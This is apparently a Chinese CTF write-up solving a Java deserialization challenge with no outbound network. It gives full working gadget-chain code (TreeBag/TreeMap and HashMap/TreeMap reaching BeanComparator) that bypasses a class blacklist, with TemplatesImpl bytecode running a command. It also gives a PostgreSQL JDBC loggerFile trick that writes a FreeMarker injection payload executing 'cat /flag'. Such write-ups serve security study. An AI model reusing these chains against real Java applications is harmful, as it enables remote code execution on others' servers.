附件
链子调出来的时候已经剩半个小时了,卡在最后模板注入中url编码的问题,最后时间来不及了,很可惜。😭
目标环境通过iptables防火墙设置不出网
Copy iptables -F
iptables -X
iptables -Z
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -m state --state NEW -j DROP
iptables -P OUTPUT DROP
iptables -n -L 添加一个规则到INPUT链,允许TCP协议的目标端口为80和22的数据包通过。
添加一个规则到OUTPUT链,允许与已建立的连接或相关的数据包通过,即允许回应外部请求的数据包通过。
添加一个规则到OUTPUT链,拒绝所有新建立的连接。
Copy server.port=80
spring.freemarker.template-loader-path=file:/app/templates/,classpath:/templates/
spring.freemarker.suffix=.ftl
spring.freemarker.cache=false
spring.freemarker.charset=UTF-8
spring.freemarker.expose-request-attributes=true
spring.freemarker.expose-session-attributes=true
spring.freemarker.expose-spring-macro-helpers=true
spring.freemarker.settings.new_builtin_class_resolver=safer freemarker的模板路径有两个可选:/app/templates和类路径下的templates目录
模板缓存关了,设置了安全的类解析器,一眼鉴定为模板注入
自定义一个ObjectInputStream,重写了resolveClass,黑名单如下:
Copy BLACKLIST.add("com.sun.jndi");
BLACKLIST.add("com.fasterxml.jackson");
BLACKLIST.add("org.springframework");
BLACKLIST.add("com.sun.rowset.JdbcRowSetImpl");
BLACKLIST.add("java.security.SignedObject");
BLACKLIST.add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
BLACKLIST.add("java.lang.Runtime");
BLACKLIST.add("java.lang.ProcessBuilder");
BLACKLIST.add("java.util.PriorityQueue"); 环境有两个重要依赖
commons-beanutils和postgresql
CB链可以调用任意getter,但常用的getter利用类JdbcRowSetImpl、com.sun.jndi.ldap.LdapAttribute(JNDI,但目标环境8u312也受限)、TemplatesImpl(加载字节码)、SignedObject(二次反序列化)
之前看到过一篇文章,在JDK17中利用反射访问JDK内部类时,会抛出IllegalAccessException异常,这与JDK9引入的模块隔离机制有关。文中提到了用一些JDBC有关的第三方依赖来代替这些常见的内部类,调用其getConnection,控制连接指定的JDBC URL。联系到这题就很容易想到postgresql的JDBC Attack
回顾一下CB链:
PriorityQueue#readObject
-> #heapify
-> #siftDown
-> #siftDownUsingComparator
-> BeanComparator#compare
-> PropertyUtils#getProperty
-> EvilObject#getter
需要调用到BeanComparator#compare,这题把CB链的入口类PriorityQueue禁了
网上找到了一个TreeBag+TreeMap配合来调用compare,用来代替CC2中的PriorityQueue
但是TreeBag是commons collections里的类,后面才发现commons beanutils居然带了commons collections(哭死)
TreeBag+TreeMap
Bag接口继承自Collection接口,定义了一个集合,该集合会记录对象在集合中出现的次数。
Defines a collection that counts the number of times an object appears in the collection. Suppose you have a Bag that contains {a, a, b, c}. Calling getCount(Object) on a would return 2, while calling uniqueSet() would return {a, b, c}.
它有一个子接口SortedBag,定义了一种可以对其唯一不重复成员排序的Bag类型。
Defines a type of Bag that maintains a sorted order among its unique representative members.
既然用到了排序,那就很有可能会调用到compare。
看看TreeBag的类介绍:
Implements SortedBag, using a TreeMap to provide the data storage. This is the standard implementation of a sorted bag.
这个类的构造器接收一个TreeMap对象,用TreeMap来存储排序的数据。
TreeMap的构造器接收一个Comparator对象,通过这个给定的比较器来排序。
TreeBag反序列化的时候会调用父类的doReadObject来对数据进行恢复,往TreeMap里put数据,TreeMap存储的是对象和它的出现次数。
Copy private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
in.defaultReadObject();
Comparator comp = (Comparator) in.readObject();
super.doReadObject(new TreeMap(comp), in);
}
protected void doReadObject(Map map, ObjectInputStream in) throws IOException, ClassNotFoundException {
this.map = map;
int entrySize = in.readInt();
for (int i = 0; i < entrySize; i++) {
Object obj = in.readObject();
int count = in.readInt();
map.put(obj, new MutableInteger(count));
size += count;
}
} 在往TreeMap里放数据时就会进行比较来排序。
Copy public V put(K key, V value) {
Entry<K,V> t = root;
if (t == null) {
compare(key, key); // type (and possibly null) check
root = new Entry<>(key, value, null);
size = 1;
modCount++;
return null;
}
int cmp;
Entry<K,V> parent;
Comparator<? super K> cpr = comparator;
if (cpr != null) {
do {
parent = t;
cmp = cpr.compare(key, t.key);
if (cmp < 0)
t = t.left;
else if (cmp > 0)
t = t.right;
else
return t.setValue(value);
} while (t != null);
}
// ...
} 构造TreeBag的时候,调用add也会触发map#put,因此我们通过反射来构造
简单看看TreeMap#put的源码,首先它会判断根节点是否为空,最初没往里面放东西肯定是为空的。
接着主要变动的有三个属性root、size和modCount(modCount不改也没事)
根节点(Entry)的parent为null
如果要设置子节点,再接着设置left和right属性即可
我们这里只需要设置一个根节点就够了,根节点放入TreeMap时会对自身的key自己跟自己进行compare
Copy import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.bag.TreeBag;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.TreeMap;
public class TreeBagTest {
public static void main(String[] args) throws Exception {
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][]{genPayload("calc")});
setFieldValue(obj, "_name", "a");
BeanComparator comparator = new BeanComparator("outputProperties");
TreeBag bag = new TreeBag();
TreeMap<Object, Object> map = new TreeMap<>();
setFieldValue(map, "size", 1);
Class<?> nodeC = Class.forName("java.util.TreeMap$Entry");
Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Class<?> mutableInteger = Class.forName("org.apache.commons.collections.bag.AbstractMapBag$MutableInteger");
Constructor<?> constructor = mutableInteger.getDeclaredConstructors()[0];
constructor.setAccessible(true);
Object MutableInteger = constructor.newInstance(1);
Object node = nodeCons.newInstance(obj, MutableInteger, null);
setFieldValue(map, "root", node);
setFieldValue(map, "comparator", comparator);
setFieldValue(bag, "map", map);
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(bag);
oos.close();
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
ois.readObject();
}
public static byte[] genPayload(String cmd) throws Exception {
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.makeClass("a");
CtClass superClass = pool.get(AbstractTranslet.class.getName());
clazz.setSuperclass(superClass);
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");
clazz.addConstructor(constructor);
clazz.getClassFile().setMajorVersion(49);
return clazz.toBytecode();
}
public static void setFieldValue(Object obj, String fieldName, Object newValue) throws Exception {
Class clazz = obj.getClass();
Field field;
try {
field = clazz.getDeclaredField(fieldName);
} catch (NoSuchFieldException e) {
field = clazz.getSuperclass().getDeclaredField(fieldName);
}
field.setAccessible(true);
field.set(obj, newValue);
}
} HashMap+TreeMap
不用那个TreeBag也可以,用原生JDK自带的。
不止TreeMap的put会调用compare,其get也会调用compare
Copy public V get(Object key) {
Entry<K,V> p = getEntry(key);
return (p==null ? null : p.value);
}
final Entry<K,V> getEntry(Object key) {
if (comparator != null)
return getEntryUsingComparator(key);
// ...
}
final Entry<K,V> getEntryUsingComparator(Object key) {
K k = (K) key;
Comparator<? super K> cpr = comparator;
if (cpr != null) {
Entry<K,V> p = root;
while (p != null) {
int cmp = cpr.compare(k, p.key);
if (cmp < 0)
p = p.left;
else if (cmp > 0)
p = p.right;
else
return p;
}
}
return null;
} 那哪里会调用Map#get呢,答案是AbstractMap.equals(刚好TreeMap没有重写equals方法)
为了判断两个Map对象是否相等,通过遍历Map A的entrySet每个键值对,比较Map B对应键的值(这里就调用了Map.get(key))是否和Map A的相等
Copy public boolean equals(Object o) {
if (o == this) // 自身比较肯定相等
return true;
if (!(o instanceof Map)) // 不是Map返回不相等
return false;
Map<?,?> m = (Map<?,?>) o;
if (m.size() != size()) // Map的大小不同肯定不相等
return false;
try {
Iterator<Entry<K,V>> i = entrySet().iterator();
// 遍历自身的EntrySet
while (i.hasNext()) {
Entry<K,V> e = i.next();
K key = e.getKey();
V value = e.getValue();
if (value == null) {
if (!(m.get(key)==null && m.containsKey(key)))
return false;
} else {
if (!value.equals(m.get(key)))
return false;
}
}
} // ...
} HashMap#readObject会调用putVal,putVal当遇到哈希碰撞时就会调用equals
Copy final V putVal(int hash, K key, V value, boolean onlyIfAbsent,
boolean evict) {
Node<K,V>[] tab; Node<K,V> p; int n, i;
if ((tab = table) == null || (n = tab.length) == 0)
n = (tab = resize()).length;
if ((p = tab[i = (n - 1) & hash]) == null) // 该位置未放元素,新建一个Node放入
tab[i] = newNode(hash, key, value, null);
else { // 该位置有元素,即哈希碰撞了
Node<K,V> e; K k;
if (p.hash == hash &&
((k = p.key) == key || (key != null && key.equals(k))))
e = p;
// ...
}
} 构造如下:
Copy TreeMap treeMap1 = makeTree(obj, comparator);
TreeMap treeMap2 = makeTree(obj, comparator);
HashMap hashMap = makeMap(treeMap1, treeMap2);
public static TreeMap<Object, Object> makeTree(Object o, Comparator comparator) throws Exception {
TreeMap<Object, Object> map = new TreeMap<>();
setFieldValue(map, "size", 1);
Class<?> nodeC = Class.forName("java.util.TreeMap$Entry");
Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Object node = nodeCons.newInstance(o, 1, null);
setFieldValue(map, "root", node);
setFieldValue(map, "comparator", comparator);
return map;
}
public static HashMap<Object, Object> makeMap(Object v1, Object v2) throws Exception {
HashMap<Object, Object> s = new HashMap<>();
setFieldValue(s, "size", 2);
Class<?> nodeC;
try {
nodeC = Class.forName("java.util.HashMap$Node");
} catch (ClassNotFoundException e) {
nodeC = Class.forName("java.util.HashMap$Entry");
}
Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Object tbl = Array.newInstance(nodeC, 2);
Array.set(tbl, 0, nodeCons.newInstance(0, v1, "b", null));
Array.set(tbl, 1, nodeCons.newInstance(0, v2, "c", null));
setFieldValue(s, "table", tbl);
return s;
} PostgreSQL JDBC Attack
org.postgresql.ds.PGSimpleDataSource继承自BaseDataSource,其getConnection()会发起JDBC连接,通过设置一些连接参数来进行攻击。
socketFactory/socketFactoryArg
这两个参数用于实例化一个类,构造器需要接收一个String类型的参数
直接想到springboot下加载XML来RCE的两个类
org.springframework.context.support.ClassPathXmlApplicationContext
org.springframework.context.support.FileSystemXmlApplicationContext
但目标环境不能出网,弃之。
这两个参数用来开启JDBC日志,一个用于指定日志记录等级,一个用于指定日志文件位置
本来想利用这个覆盖index.ftl为XML,再让ClassPathXmlApplicationContext去请求这个XML,这样就不用出网了。但是日志还会带上其他信息,而这个类解析XML对格式要求不能含有其他垃圾字符。
模板引擎就允许标签之外有其他垃圾字符。
但是有一个问题,如果直接把要写入的模板放到jdbc url的参数中,会被url编码,导致模板解析不了。
放到其他位置比如ServerNames就不会被url编码了。
EXP
Copy PGSimpleDataSource dataSource = new PGSimpleDataSource();
dataSource.setUrl("jdbc:postgresql://localhost:5432/test?loggerLevel=DEBUG&loggerFile=/app/templates/index.ftl");
String payload = "localhost/?<#assign ac=springMacroRequestContext.webApplicationContext>\n" +
"<#assign fc=ac.getBean('freeMarkerConfiguration')>\n" +
"<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n" +
"<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>\n" +
"${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}";
dataSource.setServerNames(new String[]{payload});
BeanComparator comparator = new BeanComparator("connection");
TreeMap treeMap1 = makeTree(dataSource, comparator);
TreeMap treeMap2 = makeTree(dataSource, comparator);
HashMap hashMap = makeMap(treeMap1, treeMap2);
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(hashMap);
oos.close();
System.out.println(Base64.getEncoder().encodeToString(barr.toByteArray())); 接着访问/拿到flag
Ref
https://tttang.com/archive/1462/
https://mogwailabs.de/en/blog/2023/04/look-mama-no-templatesimpl/
https://mp.weixin.qq.com/s/ClASwg6SH0uij_-IX-GahQ
https://xz.aliyun.com/t/12143
